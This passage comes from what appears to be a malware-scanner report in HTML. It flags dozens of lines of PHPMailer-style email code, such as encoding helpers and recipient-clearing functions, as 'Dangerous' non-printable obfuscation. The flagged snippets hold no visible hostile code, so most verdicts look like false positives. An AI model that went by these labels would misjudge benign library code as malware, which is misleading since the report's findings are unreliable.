</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
